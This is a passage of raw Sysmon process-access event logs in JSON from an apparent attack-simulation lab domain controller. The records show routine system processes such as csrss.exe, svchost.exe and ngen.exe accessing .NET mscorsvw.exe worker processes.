{A837DB8D-0493-5F25-0000-00100ECA0E00}\r\nTargetProcessId: 4968\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.386","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-00100ECA0E00}","TargetProcessId":"4968","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7088,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.402\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-00100ECA0E00}\r\nTargetProcessId: 4968\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.402","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-00100ECA0E00}","TargetProcessId":"4968","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7089,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.433\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0476-5F25-0000-0010E4860C00}\r\nTargetProcessId: 3304\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.433","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0476-5F25-0000-0010E4860C00}","TargetProcessId":"3304","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7090,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.433\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0476-5F25-0000-0010E4860C00}\r\nTargetProcessId: 3304\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.433","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0476-5F25-0000-0010E4860C00}","TargetProcessId":"3304","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7091,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.449\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-0010EDCD0E00}\r\nTargetProcessId: 3304\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.449","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0493-5F25-0000-0010EDCD0E00}","TargetProcessId":"3304","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7092,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.480\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-001040670E00}\r\nTargetProcessId: 2672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.480","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-001040670E00}","TargetProcessId":"2672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7093,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.480\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-001040670E00}\r\nTargetProcessId: 2672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.480","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-001040670E00}","TargetProcessId":"2672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7094,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.480\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0491-5F25-0000-001040670E00}\r\nTargetProcessId: 2672\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:43.480","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0491-5F25-0000-001040670E00}","TargetProcessId":"2672","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7095,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:43.511\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0493-5F25-0000-0010DDD40E00}\r\nTargetProcessId: 4412\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: 